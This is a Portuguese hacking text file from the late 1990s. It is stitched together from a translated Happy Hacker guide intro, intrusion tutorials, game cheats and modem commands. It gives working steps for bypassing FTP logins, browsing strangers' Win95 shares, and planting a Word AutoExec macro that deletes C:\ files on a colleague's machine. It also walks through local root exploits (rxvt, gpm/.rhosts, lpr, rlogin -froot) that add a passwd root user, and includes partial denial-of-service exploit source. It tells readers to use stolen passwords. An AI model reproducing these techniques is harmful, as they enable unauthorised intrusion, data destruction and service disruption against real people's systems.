Mesmo asim se caso tenhas já encontrado coisa similar, praticamente estará cheio de
informações vagas e já velhas. Dá um tempo.

Como também se fores até um desses hackers news groups no Internet e perguntares para as
pessoas lá, como fazer todos esses truques, muitos deles até te insultarão ou te chacotearão.
OK, hackers estão sempre fazendo troça contigo.

Nós vemos muitos hackers se vangloriando, mantendo-se obscuros, se recusando a ajudar
outros à aprender como hackear. Por Que? Porque eles não querem que você na verdade descubra
que na verdade, a maioria das coisas que eles fazem é muito simples!

Bem; Até pensamos nisso também. Nós pensamos no prazer em insultar as pessaos que nos
perguntam em como hackear. Ou melhor podíamos satisfazer nossos egos ao realmente ensinar
essas mesmas pessoas, talvez milhares, a hackear. Prefiro ensinar, bom pro meu ego. he,he,he

Como usar os Guia de (na maioria) Hacking Inofensivo

Se sabes como usar um micro e estás conectado ao Internet, você já sabe o suficiente para
começar a aprender a ser um hacker, nem precisas ler todos os GDMHI para se tornar um hacker.

Podes contar que tudo nos Volumes I, II, e III é tão fácil, que podes começar a ler em
qualquer seção que te interesse e seguir as instruções.

Mas se seu plano é se tornar "elite", seria muito melhor se lesses todos os Guias,
visite os muitos WEB sites e newsgroups aos quais indicarmos, podes até achar um "tutor"
entre os tantos talentosos hackers que enviam material para o nosso Hackers forum ou converse
no nosso servidor com IRC no seguinte endereço: http://www.infowar.com como também na
Happy Hacker lista de e-mail ((email hacker@techbroker.com) com a mensagem "subscribe").

Se o seu goal é se tornar um Uberhacker, os Guias terminarão sendo só os primeiros em uma
montanha de material que você precisará estudar. Embora te oferecemos uma estratégia de estudo,
que muito te ajudará em sua missão de alcançar o pedestal de hacking.

Como Não Ser Pego

Um pequeno problemaem hackear é que se você pisar além da linha, você pode ir prá cadeia.
Nós faremos o melhor possível em descrever tipos de hackeação que podem te causar problemas
com a lei. Mas saibas que não somos advogados ou especialistas em leis de computação.
Ainda por cima, todo o estado e todo país possuem suas próprias leis em vigor, e essas leis
estão sempre mudando. Devido a essas coisas, deves agir com um pouco de senso.

Embora tenhamos um Guia de (na maioria) Hacking Inofensivo sobre leis de computação, que pode
te evitar cometer certas "pisadas na bola".

Mas, sem dúvida, a melhor proteção contra ser pego, é a "regra de ouro", se você está prestes
a fazer algo que não gostarias de ser feito com você, esqueça! Faça hackeação que torne esse
mundo melhor, ou que no minímo seja divertida e inofensiva, e te garanto sempre se manterás
fora de qualquer problema.

Logo, se você tiver uma idéia tirada do Guia De (na maioria) Hacking Inofensivo, que te
ajudaria a fazer algo malicioso ou destrutivo, o problema é só seu se serás o próximo
HACKER atrás das grades. Ei, a lei não liga se a pessoa a que o computador você hackeou
era um babaca. Não liga se o banco de dados da poderosa firma ao qual você bagunçou tinha
despedido seu melhor amigo. Eles só se interesarão em saber que você quebrou a lei.

Para algumas pessaos parece ser emocionante, em iniciar uma histeria nacional, ao se
fazer parte de um novo ataque dos Diabólicos Hackers no país. Mas depois do julgamento,
quando esse leitor dos Guias, se tornar a "namorada" na cela do sujeito chamado "espeto",
será que todo esse show valeu a pena para ele?

------------------------------------------------------------------------
NOTA DE TRADUÇÃO:

_Nessa parte do documento original do Guia, se encontra a seção sobre gírias e linguagem hacker,
devido ao fato de as mesmas não fazerem nenhum sentido gramática ou contextualmente quando
trazidas ao Português, Não foram incluídas nesse Guia. Os interessados podem ter acesso a
elas no Guia em Inglês, nesse mesmo site. Obrigado!_

------------------------------------------------------------------------

Quem É Você?

Presumimos algumas razões por que você estaria lendo estes Guias:

. Você possui seu próprio micro IBM ou Macintosh
. Você possui uma conta de Internet com algum provedor
. Você é dono de um senso de humor e de aventura, e deseja expresá-
los através de hacking
. Ou, você quer impressionar seu círculo de amigos e descolar umas
gatas, (ou gatos), ao fazê-los pensar que és um Diabólico Hacker

E aí, esse cenário descreve você? Se positivo, OK, Liga aí seus computadores,
estão todos preparados para começar a hackear?.


________________________________________________________________________

*****
Abaixo segue uma extensa lista de endereços e informação direcionados para vários WEB sites,
IRC chat, listagem de e-mail e muitos outros recursos sobre hacking em geral, sem dúvida de
um valor informativo exepcional, mas obviamente toda essa informação é escrita na língua
inglesa.Entre ao seu próprio risco :)
*****
__________________________________//_________________________________

Se quiseres ver edições anteriores dos Guias, procure em alguns desses:

http://www.vcalpha.com/silicon/void-f.html or
http://www3.ns.sympatico.ca/loukas.halo8/HappyHacker/
http://www.geocities.com/TimesSquare/Arcade/4594

Também temos uma sala de chat e arquivos em:
http://www.infowar.com/cgi-shl/login.exe.

Converse conosco no Happy Hacker canal de IRC. Se seu browser pode rodar Java,
somente direcione seu browser para: www.infowar.com, clique em "chat" e escolha o
"hackers channel".

para se subscrever em nossa nossa lista de e-mail mande nos uma e-mail para:
hacker@techbroker.com e com a mensagem "subscribe"

Queres dividir alguma boa novidade com a lista Happy Hacker? Ou corrigir algum erro?
Envie suas mensagens para: hacker@techbroker.com. Para me enviar e-mail confidencial,
(por favor, nenhuma discussão de atividades ilegais), use: carolyn@teckbroker.com,
certificando-se de informar na mensagem que você gostaria de mantê-la confidencial.
Se preferes que sua mensagem seja anônima, informe também sobre isso!
Dirija todas as reclamações para: /dev/null@techbroker.com, e feliz hacking!!
Copyright 1997 Carolyn P. Meinel. Esse GUIA DE (na maioria) HACKING INOFENSIVO,
pode ser enviado ou posto no seu Web site desde esse aviso seja colocado no final..
credits : Wilson Nogueira

Camuflando Seu IP (Navegando Anônimo)

Aviso:

Todas as dicas contidas nesta área são totalmente de sua responsabilidade, estão aqui apenas com o intuito de trazer as informações para que vocês internautas tenham um conhecimento além do normal e saiba como se defender na internet, portanto eu não me responsabilizo por qualquer ato imbecil que você venha a fazer com as informações aqui contidas.

Anonymizer

Qualquer Home-Page que você visita pode muito bem obter informações sobre você, como por exemplo: Provedor, endereço IP, sistema operacional que esta usando,navegador que esta usando e talvez o e-mail. O Anonymizer http://www.anonymizer.com age como intermediário entre o seu programa de navegação e os outros websites. Assim sendo, ele impede que o site visitado tenha acesso a qualquer tipo de informação sua. Para usar o serviço, você deve anteceder os URLs com o seguinte endereço do Anonymizer (http://www.anonymizer.com:8080). Se você quiser acessar a home-page da Microsoft, por exemplo, e não quiser que ela obtenha seus dados, você deve digitar no seu navegador:

http://www.anonymizer.com:8080/http://www.microsoft.com Pronto desta forma você poderá' até mesmo usar aquelas senhas de sites pornográficos, que você tinha sem se preocupar tanto com a sua segurança.


OBSERVAÇÃO:


O Anonymizer não é 100% seguro. Por isso se puder user tb outros tipos de camuflagem.

Cracker

COMO HACKEAR SERVIDORES DE FTP

Para Hackear um Servidor FTP, primeiro vc deve saber o endereco do Host ou
seu IP, para isto use o IPSCAN, digitando o IP Principal do Host:

Lista de Alguns FTP's

>>> ftp.mandic.com.br
>>> ftp.bestway.com.br
>>> ftp.netscape.com
>>> ftp.angelfire.com
>>> ftp.internetclub.com.br (servidor Hackeado por SeQ MaSsIvE,
WARBLADE(r), Speed, kkkkk e CRAMBLE)....


Let's HaCk !!!

Existem vários Programas de FTP'S, mas se não quiser saber de FTP porra
nenhuma use aquele do DOS !!!

Va ao Prompt e digite FTP, ao aparece o prompt ftp,
digite OPEN, ira abrir um outro Prompt (to), digite o nome do host ou seu
IP, tipo (to) ftp.mandic.com.br.

Ao conectar ele pedira a senha e o Password, tente usar os passwords UNIX,
(os famosos defaults) se nao der vc deve entrar INVISÍVEL !!!! Mas como
entrar invisível ?!?!?!
Isso e' fácil... no login pressione ENTER, no password pressione novamente...
Ira aparecer o prompt ftp novamente...., ai e' so' digitar:

quote user ftp
quote cwd ~root
quote pass ftp

Pronto, você ja esta lá dentro!!!

Mas tem um porem..., se escrever a mensagem : USER RESTRICTION APLLY, voce
não esta Hackeando.., pois esta aplicada a proteção..., para isto tente com
outro user tipo quote cwd ~sys e os outros da lista UNIX....

ATENÇÃO !!!!

Nao tente Hackear usando o user normal de FTP'S, que e login : anonymous e
password: seu E-Mail, pois vai ser aplicado a proteção....

MEU DEUS, EU ENTREI, E AGORA O QUE FAÇO??????

Ao entrar vc vai estar no Diretório do login, tipo \home\root\,
Dai, para ver a lista de usuarios, voce volta um dir vá para o dir \home\
e cada dir e um usuario,... não tentem pegar as senhas , pois são
Cryptografadas...
Pois a maioria dos users usa a mesma senha login....
Ok... se você não sabe os comandos, ai vai a dica...., se você estiver no MS-DOS,
digite ? e tecle ENTER em qualquer lugar, pois ira aparecer os comandos...
e ai e s¢ Hackear !!!

OBS: Não fique mais que 5 Min em um servidor, pois ele cacara seu IP, e seu
login, e vai ser CADEIA !!!
Não responsabilizamos por atos cometidos nos Hosts... o problema e de quem
HaCkEiA, e não nosso, pois tome muito cuidado, e NUNCA, mas NUNCA apague
NADA !!!!!!!!!

Para sua maior seguranca, utilize uma senha roubada.

INVASAO POR IP

Alegria de uns, tristeza de outros... na verdade, aqueles que utilizam a
rede Dial-Up do Win95 para sua coneccao com a internet podem estar correndo
serios riscos, a nao ser, e' claro, que assim conectam-se propositalmente,
com inten‡oes "diversas".

Utilizar-se de uma coneccao PPP do Win95 num provedor de acesso, significa
estar disponibilizando seu computador a todos os usuarios da Net. Mesmo sem
o compartilhamento de arquivos, existem diversas ferramentas que permitem a
outra pessoa conectar-se ao seu computador caso voce esteja utilizando esse
tipo de coneccao.

Conecte-se a Internet utilizando a rede Dial-Up do Win95. Se o seu provedor
nao disponibilizar uma conec‡Æo do tipo PPP, estas dicas nao funcionarao.

Verifique antes, se voce possui os drivers clientes para redes Microsoft.
Caso nao estejam instalados, instale-os atraves do Painel de Controle, no
icone Redes.

Verifique tambem se o compartilhamento de Arquivos e Impressoras est
instalado.

Se estiver, voce estara sujeito a que outra pessoa conecte-se ao seu
computador simplesmente sabendo seu IP. Se bem que, para aqueles que ja
sabem, existem mil maneiras diferentes de se "burlar" a fraquinha seguran‡a
do Win95. Para voce poder encontrar outros computadores compartilhados, vocˆ
deve configurar WINS e LMHOSTS. O WINS e' utilizado para localizar os
computadores com IP fixo. O LMHOSTS, e' acionado automaticamente na procura
de computadores que possuem IP dinamicos.
ATEN€AO : TODOS ESSES ARQUIVOS SE ENCONTRAM NO C:\WINDOWS

Configurar essas opcoes e' simples. Va ao Painel de Controle e abra Rede.
Verifique as propriedades do protocolo TCP/IP. Ali voce encontrara a opcao
para ativar a resolu‡Æo WINS. No caso de vocˆ nao conhecer nenhum servidor
WINS, utilize 204.118.34.6 como primario e 204.118.34.11 como secundario.
Esses servidores sao dos USA, e gratuitos. Caso queira outros enderecos,
utilize um dos mecanismos de busca na Internet.

Para configurar o LMHOSTS, voce precisa criar um arquivo texto simples,
utilizando-se ate mesmo o Bloco de Notas do Windows. O arquivo criado deve
chamar-se LMHOSTS. E' nesse arquivo que ficarao os endere‡os de IP e os nomes
dos computadores que voce tera acesso. Para localizar um determinado
computador, voce digita o seu numero de IP e a seguir seu NetBios, na mesma
linha, separados por um espa‡o.

Se voce executar o programa NBSTSTAT, seguido da op‡Æo -N, voce obtera essa
lista, com o nome e o IP de seu computador sempre sendo o primeiro da lista,
seguido das outras maquinas disponiveis, tudo numa janela DOS.

Atrav‚s do Explorer voce podera ver os computadores disponiveis na rede, dos
quais voce ainda podera utilizar os discos mapeando-os, o que os tornara
unidades de seu computador.


Se voce for muito estupido e ainda nao entendeu, deixa eu explicar em outra
linguagem:

Utilizando essas configuracoes acima, voce pode, atraves do seu Windows
Explorer, acessar computadores de outras pessoas que nao tem nada a ver
com a historia, o cara pode estar do outro lado do mundo, la na Polonia ou
nos EUA, por exemplo, ele esta la quietinho, pesquisando paginas ou no
bate-papo, e voce pode mexer e fucar no computador dele como se ele fosse
uma unidade de disco! Isso mesmo! Faz de conta que o computador do cara seja
uma unidade de disquete, e voce pode mexer, mover, espionar, copiar, e ate
apagar arquivos do micro dele!

OBS: tome cuidado para nao ser preso!

MACROS DO WORD

Ainda hoje existe muita gente que so e capaz de abrir o WORD, editar,
negritar, sublinhar e mandar para impressora, muitos, milhares so sabem
mexer no basico mesmo. Eles nem imaginam o que tem por tras deste riquissimo
processador de texto.

Esta materia tem como objetivo fazer desde pequenas ate grandes sacanagens
com usuarios pentelhos.

Software/Versao Abrangida: Microsoft Word, versoes 6 (win3.11) e 7.0 (win95)
O Word possui um arquivo chamado NORMAL.DOT, onde estao todas as configuracoes
padrao do Word. Se por algum motivo este arquivo for deletado, o Word o cria
automaticamente quando for inicializado.

Niveis de Sacanagem:

Nivel 1..... Apenas uma brincadeira
Nivel 2..... Apenas uma brincadeira de mau gosto
Nivel 3..... Ja nao e' mais uma brincadeira.

Primeiro voce precisa criar uma macro... siga os passos:

Entre no Word, feche a janela de documento, nao deixe nenhum documento aberto
(ativo), clique em Arquivo(File) depois Macro, coloque no nome da macro
"AutoExec" (obrigatorio) esta macro e' inicializada toda vez que o Word for
iniciado, depois clique em "Criar", delete as duas linhas que tiver la
(Sub MAIN e End Sub) e cole a rotina que tem logo mais abaixo.

PS: Existem outras formas e meios de criar uma macro,mas esta e' mais simples

Nivel 1

O nivel 1 serve para voce se mostrar, falando que entende do Word melhor do
que ninguem.
Cada vez que o usuario inicia o Word recebera uma mensagem... de alerta ou
qualquer outro coisa que sair da sua mente. Veja abaixo:

Sub MAIN
MsgBox "Voce e um pentelho! Eu nao irei prosseguir com o sistema", "Microsoft
Word", 5
MsgBox "Usuario Pirata Detectado", "FATAL ERROR", 16
MsgBox "JAMES BOND 007 ", "007 na estrada Digital", 64
End Sub

Nota: faca tudo isso em uma so linha, e' que aqui nao deu pra colocar porque
faltou espaco, ok?

Nivel 2

E' para deixar o usuario irritadissimo. No corpo da macro cole este texto
abaixo:

Sub MAIN
ArquivoNovoPadrao
Inserir "James"
ArquivoNovoPadrao
Inserir "Bond"
ArquivoNovoPadrao
Inserir "007"
ArquivoNovoPadrao
Inserir "James Bond 007 Na Estrada digital "
ArquivoNovoPadrao
Inserir "."
ArquivoNovoPadrao
Inserir "."
ArquivoNovoPadrao
Inserir "."
ArquivoNovoPadrao
Inserir "."
ArquivoNovoPadrao
Inserir "."
ArquivoNovoPadrao
Inserir "."
ArquivoNovoPadrao
Inserir "."
ArquivoNovoPadrao
Inserir "."
ArquivoNovoPadrao
Inserir "."
ArquivoNovoPadrao
Inserir "."
ArquivoNovoPadrao
Inserir "."
ArquivoNovoPadrao
Inserir "."
ArquivoNovoPadrao
Inserir "."
ArquivoNovoPadrao
Inserir "."
ArquivoNovoPadrao
Inserir "James Bond 007 Na Estrada digital "
End Sub


Nivel 3

Bom este nivel e pura sacanagem, com ele um simples clicar do mouse, e tudo
desaparece! Isso mesmo, "DEL *.*" ou apenas os documentos, voce e quem sabe.

Sub MAIN
Kill "C:\*.*"
Kill "C:\WINDOWS\*.*"
Kill "C:\WINWORD\*.*"
End Sub

Lembre-se de que estes macros sao gravados no arquivo default do word, ou
seja, no NORMAL.DOT. De este arquivo for deletado, o Word automaticamente
ira criar outro na inicializacao, entao se voce for fazer estas sacanagens
acima, proteja este arquivo, com o comando 'attrib +r'.
Detalhes: Existe uma forma de iniciar o Word, sem que inicialize a macro
'AutoExec' mas nao irei falar, descubra voce mesmo. A macro do word e uma
ferramenta riquissima, procure fucar. Voce pode fazer estas no seu proprio
computador (se cuide!), salvando sempre no arq. "normal.dot" depois copie
apenas este arquivo para aquele seu colega/amigo pentelho e saia de perto,
para nao explodir em voce.

LISTÇO !!!!
para se usar os comandos do MODEM!

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Comando: Resposta:

+++ATQ0 Mostra os resultados do comando.
+++ATQ1 NÆo mostra os resultados dos comandos.
+++ATN0 Desliga o modo de autodetecta‡Æo!
+++ATN1 Liga o modo de autodetecta‡Æo.
+++ATM0 Desliga o speaker do modem!
+++ATM2 Liga o speaker do modem!
+++ATL0 Volume baixo no speaker do modem.
+++ATL2 Volume m‚dio no speaker do modem.
+++ATL3 Volume alto no speaker do modem.
+++ATI(0 AT� O 7) Mostra descri‡äes sobre o modem.
+++ATI5 Mostra os n§ armazenados na mem¢ria NVRAM.
+++ATH0 Hang-up
+++ATH1 Tipo o hang-up
+++ATF(0 AO 10) Seleciona uma versÆo para o modem (default=0)
+++ATE0 Desliga o echo, ECHO OFF
+++ATE1 Liga o echo, ECHO ON
+++ATDP Disca no modo pulse
+++ATDS=n Disca o n£mero na mem¢ria NVRAM (n=0-3).
AT&Z(0-3)=(N§) Armazena os n§'s na mem¢ria NVRAM.
ATS3D Serve para conectar atraves do telefone

RISE OF THE TRIAD

Em qualquer momento do jogo, digite estes passwords para se dar bem:

TOOSAD=> god mode

CHOJIN=> you are un-killable

GOTO=> level warp

SIXTOYS=> various useful items

FLYBOY=> enables you to fly

BADTRIP=> for a psychedelic experience ( try it!! )

BOING=> elasto mode

SPEED=> auto run mode, for the lazy

PANIC=> restore yourself to normal

DIMON=> light diminishing on

DIMOFF=> light diminishing off

LONDOM=> fog on

NODNOL=> fog off

GOGATES=> quit!

GOARCH=> teleport strainght to level end

GOTA386=> use 386 mode

LUNGDUNG=>gas mask

86ME=> use 8086 mode ( oh dear !! )

JOHNWOO=> dual pistols

PLUGEM=> MP40 sub-machine gun

VANILLA=> bazooka weapon

HOTTIMES=>heat seeker launcher

FIREBOMB=>fire-bomb weapon

BONES=> flame wall weapon

SEEYA=> hand of god ( try it !! )



OBS: ANTES de digitar os càdigos, digite DIPSTICK.

PORTA 666 ;O

Exploits EM GERAL! mas ai vc se pergunta "O que são exploits? eu respondo

A palavra mesmo já dá uma idéia do que seja... explorar... explorar o que? Explorar vunerabilidades de sistemas, saca? Tipo, se existe um bug no Outlook Express que quando você manda uma msg, pra alguem que usa ele pra receber email, com o assunto (subject) com mais de 5000 caracteres ele trava, então fazem exploits ou voce mesmo pode fazer que explora essa vunerabilidade, saca... um exploit pode ser um programa ou mesmo só o codigo dele que voce pode compilar em seu computador. Compilar é pegar seu codigo fonte e faze-lo ficar executável... programação saca.... Para que servem? Vélho, pense assim, pô, se existe um erro, a gente pode explora-lo para beneficio próprio, saca. Tipo existia um erro num sendmail aí que você podia anexar a qualquer email o próprio arquivo de senhas do servidor, então fizeram um exploit para fazer isso com mais facilidade e muito mais êxito saca... com o exploit voce precisaria apenas falar pra que email era pra enviar o arquivo de senhas e o exploit fazia o resto... essa manha do sendmail já foi arrumada a um tempão viu.... existem muito erros em programas por aí que podemos exploita-los saca... "Regras!" Não é bem uma regra, porque essa não existe pra ser quebrada. Você pode usar vários exploits que existem por aí, mas nunca em benefício do mau saca. Voce não tem o direito de usar a porra de um exploit, q uma pessoa regaço os neuronios pra faze-lo, pra chegar e derrubar um site pra o seu encher de visitas. Esse não é a ideologia de quem faz exploits, eles existem pra denunciar as inseguranças, para que pessoas usem eles para fazerem algo de bom saca... Que tal você pegar e tranferir uma grana de um politico desses aí pra uma instituiçao dessas massa... o q acha. Não se esqueça de que usando apenas exploits você não estará fazendo um ataque completamente seu, a maioria do ataque foi feito pelo carinha q fez o exploit. Crie, nao copie! Onde econtra-los? Existe alguns sites que publicam exploits, e você mesmo pode publicar o seu neles. Tipo, tem a RootShell, que é estrangeiro, mas muito bom o site, apesar de tá fraquinho hoje em dia. Tem tb o a Securenet que é Brasileiro, e muito bom por sinal, vários exploits. Mais um pouco de exploits EXPLOIT Exploits locais são programas geralmente feitos em C que explorarm a vulnerabilidade de programas e sistemas para ganhar acesso root ( de administrador ) , 90% dos exploits são para sistemas Linux , os exploits locais são scripts em C que vc irá rodar no servidor a partir de uma shell adquirida , os exploits locais são os melhores de se usar , pela sua variedade e confiaça de acesso ( desde que voce saiba o que está fazendo ) , alguns possuem pequenos trojans para dar acesso ao seu desenvolvedor , o que acho importante de se saber C para vc não se dar mal , mais isso é bom pq ferra os Lahma tbm : ) . Existem varios tipos de exploits locais , uma infinidade , cada um com sua função e seu jeito de executar . O que vc vai fazer é basicamente o seguinte , voce irá copiar o exploit para o provedor de sua shell e depois compilar ele , para copiar voce usa um programa de FTP e para compilar voce irá usar o telnet , ( use o Linux nessa operação toda ), após ter copiado o exploit para a shell vamos compilar ele : Welcome to Linux 2.0.X Host Login : nirvana Password: Linux 2.0.X Host :~$ gcc -o exploit exploit.c

--------------------

1

Exploits locais são programas geralmente feitos em C que exploram a vulnerabilidade de programas e sistemas para ganhar acesso root ( de administrador ) , 90% dos exploits são para sistemas Linux , os exploits locais são scripts em C que você irá rodar no servidor a partir de uma shell adquirida , os exploits locais são os melhores de se usar , pela sua variedade e confiança de acesso ( desde que você saiba o que está fazendo ) , alguns possuem pequenos trojans para dar acesso ao seu programador .

Existem vários tipos de exploits locais , uma infinidade , cada um com sua função e seu jeito de executar . O que você vai fazer é basicamente o seguinte , você irá copiar o exploits para o provedor de sua shell e depois compilar ele , para copiar você usa um programa de FTP e para compilar você irá usar o telnet , ( use o Linux nessa operação toda ), após ter copiado o exploits para a shell vamos compilar ele :
Welcome to Linux 2.0.X

Host Login : nirvana
Password:
Linux 2.0.X

Host :~$ gcc -o exploits exploits.c < ----Compilando o Exploits.

Depois de compilado vamos rodá-lo para ganhar acesso root .

Host :~$ ./exploit <---Rodando o exploit no sistema.

Depois que você rodar o exploits vai aparecer uma série de Lixos , que geralmente são os Buffer Owerflows no sistema , ai logo surgirá o prompt root :

Host :~# <---Aqui tu ficou root no sistema , deu certo :) bah!!!

Agora você poderá acrescentar um usuário root para que não tenha que fazer toda essa merda de novo , você pode usar o adduser e depois colocar os 0:0 de root no passwd ou fazer diretamente pelo comando echo , o que acho mais confiável .

Host :~# echo newroot::0:1:Novo Root:/:bin/bash <<<---colocando usuário no passwd .

Se o sistema tiver shadow você acrescenta devida linha no shadow também , depois é só se logar novamente e fazer a festa . :)

Welcome to Linux 2.0.X

Host Login : newroot
Password:
Linux 2.0.X

Host :~#

ExploitS RemotoS
SecuritY

Os Exploits Remotos como já diz o próprio nome , são parecidos com os Exploits Locais , mais , não precisam de uma shell para Hackear na maquina a qual se quer Hackear , precisa é de uma base para rodá-lo , podendo ser um Linux e nunca um Windows , pois o programa é em C ou Perl e o RWindows não permite tal tarefa ; os exploits remotos exploram Bugs remotamente dando ao Hacker acesso privilegiado no sistema . O que você vai fazer é pegar o exploit , compilar ele no seu Linux e depois rodá-lo com o host ao qual vai atacar . As vulnerabilidades mais comuns usadas são as de BIND , FTP , IMAPD e POP . Você pode achar esses exploits na net , não colocarei eles aqui por motivo de segurança , ja que esta page é para fins educativos e de prevenção , e não escola de bunda mole :)

Usando o exploits :

Host :# gcc -o exploit exploit.c < ----Compilando o Exploit.
Host :# ./exploit
***************************
Exploit Remoto by Security Chaos
Use Exploit ./exploit host
***************************
Host :# ./exploit 127.0.0.1

Logo que na sua maioria ele der o buffer Owerflow remotamente no sistema ele te dará o prompt root e você poderá adicionar o seu user root .

--------------------

2

Exploitando:

1. Logue em um sistema qualquer que você tenha um account.

2. Digite no Shell:
$ echo 'cp /bin/sh /tmp/rxsh;chmod 4755 /tmp/rxsh' > /tmp/rxbug
$ chmod +x /tmp/rxbug
$ rxvt -print-pipe /tmp/rxbug
3. No rxvt xclient:
$ cat
ESC[5i
ESC[4i

4. $ /tmp/rxsh
# whoami
root
#

------------------------------------------------------------------------------

O problema do KILL MOUSE/STARTMOUSE, este comando esta na parte
dos pacotes DOOM em sistemas LINUX, ‚ só rodar estes dois scripts.

----------------------------------startmouse.sh

/usr/games/doom/startmouse.sh:
#!/bin/sh
if [ -r /tmp/gpmkilled ]; then
/usr/bin/grep gpm /etc/rc.d/rc.local > /tmp/gpmscript
/bin/sh /tmp/gpmscript; /bin/rm /tmp/gpmscript /tmp/gpmkilled
fi

----------------------------------startmouse.sh

----------------------------------killmouse.sh

/usr/games/doom/killmouse.sh:
#!/bin/sh
if /bin/ps ax | /usr/bin/grep -v grep | /usr/bin/grep "gpm" ; then
GPM_RUNNING=true; /bin/killall gpm; /bin/touch /tmp/gpmkilled
fi

----------------------------------killmouse.sh

$ touch /tmp/gpmkilled
$ /usr/games/doom/startmouse

ps -aux | grep gpm
bo 1436 0.0 2.0 40 312 v03 R 16:33 0:00 grep gpm
root 1407 0.0 2.4 42 368 ? S 16:24 0:00 /usr/bin/gpm t ms


$ umask 0
$ ln -s /root/.rhosts /tmp/gpmkilled
$ /usr/games/doom/killmouse
1407 ? S 0:00 gpm t ms

$ ls -l /root/.rhosts
-rw-rw-rw- 1 root users 0 Dec 13 16:44 /root/.rhosts

$ echo localhost bo > /root/.rhosts
$ rsh -l root localhost sh -i
bash#

------------------------------------------------------------------------------

Jaeger, abre a porta do cliente, sistema FBSD, ultrix e linux
by jaeger (jaeger@dhp.com)

begin prservice.c

------------------Corte aqui

/* modified by jaeger 12Nov1996. Duplicated slack coding style.



now takes

port locuser remuser [cmd]

port remuser passwd [cmd]

where port is the dst port you wish the stderr socket to connect to

from the server to the client machine.



/* generate ^@string1^@string2^@cmd^@ input to netcat, for scripting up

rsh/rexec attacks. Needs to be a prog because shells strip out nulls.



args:

locuser remuser [cmd]

remuser passwd [cmd]



cmd defaults to "pwd".



... whatever. _H*/



#include



/* change if you like; "id" is a good one for figuring out if you won too */

static char cmd[] = "pwd";



static char buf [256];



main(argc, argv)

int argc;

char * argv[];

{

register int x;

register int y = 0;

char * p;

char * q;



p = buf;

memset (buf, 0, 256);



if (! argv[1])

goto wrong;

x = strlen (argv[1]);

memcpy (p, argv[1], x); /* port plus null */

x++;

p += x;

y += x;



if (! argv[2])

goto wrong;

x = strlen (argv[2]);

memcpy (p, argv[2], x); /* second arg plus null */

x++;

p += x;

y += x;



if (! argv[3])

---------------------Corte aqui

------------------------------------------------------------------------------

Usuário pode pegar o passwd, sistema linux
by Zygo Blacell (zblaxell@MIRANDA.UWATERLOO.CA)

Em um diretório onde você possa escrever, entre nele e edita um
arquivo unlinkavel. O problema esta em lpr(1)não olhe os
diretorios com (eg. /tmp)

[ patch deleted]

D'oh! It doesn't. :(

Patheie o script e zaz daqui algums dias volte l e de um lpr-s

mkdir /tmp/foobar
ln -s /etc/passwd /tmp/foobar
lpr big_huge_file
lpr -r /tmp/foobar/passwd

rm -rf /tmp/foobar ; ln -s /etc /tmp/foobar

OU

ln -fs /home/private_file /tmp/foobar/passwd # Does this work?

/etc/passwd goes away.

------------------------------------------------------------------------------

Usuário loga como ROOT, sistema linux
by Ken Weaverling (weave@hopi.dtcc.edu)

Em alguns sistemas antigos de Linux existem um bug muito escroto,
onde ‚ so colocao alguns sinais que vc loga como ROOT...

No sistema Slackware 2.3/ kernel 1.2.13. ‚ só digitar quando vc
for logar pelo telnet...

'+::0:0:::'

Sacou ‚ isto mesmo ‚ s¢ digitar no password '+::0:0:::'

------------------------------------------------------------------------------

Rlogin, usuário loga como ROOT, sistema AIX e
Linux (Slackware 3.1, Redhat 2.0-2.1) autor desconhecido bug
retirado da ROOTSHELL

:
% rlogin haxored.net -l -froot
#

------------------------------------------------------------------------------

ip_fragment.c, não sei o que faz ainda não testei, sistema
Linux 2.0.33 remandado por Michal Zalewski


----------------------ip_fragment.c

if(len>65535)
{
- printk("Oversized IP packet from %s.\n", in_ntoa(qp->iph->saddr));
+ NETDEBUG(printk("Oversized IP packet from %s.\n", in_ntoa(qp->iph->saddr)));
ip_statistics.IpReasmFails++;
ip_free(qp);
return NULL;

-------------------------------------------------------------------------

// overdrop by lcamtuf [Linux 2.0.33 printk abuse]
// ------------------------------------------------
// based on (reaped from) teardrop by route|daemon9

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define IP_MF 0x2000
#define IPH 0x14
#define UDPH 0x8
#define PADDING 0x1c
#define MAGIC 0x3
#define COUNT 0xBEEF
#define FRAG2 0xFFFF

void usage(char *name) {
fprintf(stderr,"%s dst_ip [ -n how_many ] [ -s src_ip ] [ -x ] (use -x for express delivery).\n",name);
exit(0);
}

u_long name_resolve(char *host_name) {
struct in_addr addr;
struct hostent *host_ent;
if ((addr.s_addr=inet_addr(host_name))==-1) {
if (!(host_ent=gethostbyname(host_name))) return (0);
bcopy(host_ent->h_addr,(char *)&addr.s_addr,host_ent->h_length);
}
return (addr.s_addr);
}


void send_frags(int sock,u_long src_ip,u_long dst_ip,u_short src_prt,u_short dst_prt) {
u_char *packet=NULL,*p_ptr=NULL;
u_char byte;
struct sockaddr_in sin;
sin.sin_family=AF_INET;
sin.sin_port=src_prt;
sin.sin_addr.s_addr=dst_ip;
packet=(u_char *)malloc(IPH+UDPH+PADDING);
p_ptr=packet;
bzero((u_char *)p_ptr,IPH+UDPH+PADDING);
byte=0x45;
memcpy(p_ptr,&byte,sizeof(u_char));
p_ptr+=2;
*((u_short *)p_ptr)=htons(IPH+UDPH+PADDING);
p_ptr+=2;
*((u_short *)p_ptr)=htons(242);
p_ptr+=2;
*((u_short *)p_ptr)|=htons(IP_MF);
p_ptr+=2;
*((u_short *)p_ptr)=0x40;
byte=IPPROTO_UDP;
memcpy(p_ptr+1,&byte,sizeof(u_char));
p_ptr+=4;
*((u_long *)p_ptr)=src_ip;
p_ptr+=4;
*((u_long *)p_ptr)=dst_ip;
p_ptr+=4;
*((u_short *)p_ptr)=htons(src_prt);
p_ptr+=2;
*((u_short *)p_ptr)=htons(dst_prt);
p_ptr+=2;
*((u_short *)p_ptr)=htons(8+PADDING);
if (sendto(sock,packet,IPH+UDPH+PADDING,0,(struct sockaddr *)&sin,
sizeof(struct sockaddr))==-1) {
perror("\nsendto");
free(packet);
exit(1);
}
p_ptr=&packet[2];
*((u_short *)p_ptr)=htons(IPH+MAGIC+1);
p_ptr+=4;
*((u_short *)p_ptr)=htons(FRAG2);
if (sendto(sock,packet,IPH+MAGIC+1,0,(struct sockaddr *)&sin,
sizeof(struct sockaddr))==-1) {
perror("\nsendto");
free(packet);
exit(1);
}
free(packet);
}


int main(int argc, char **argv) {
int one=1,count=0,i,rip_sock,lag=500;
u_long src_ip=0,dst_ip=0;
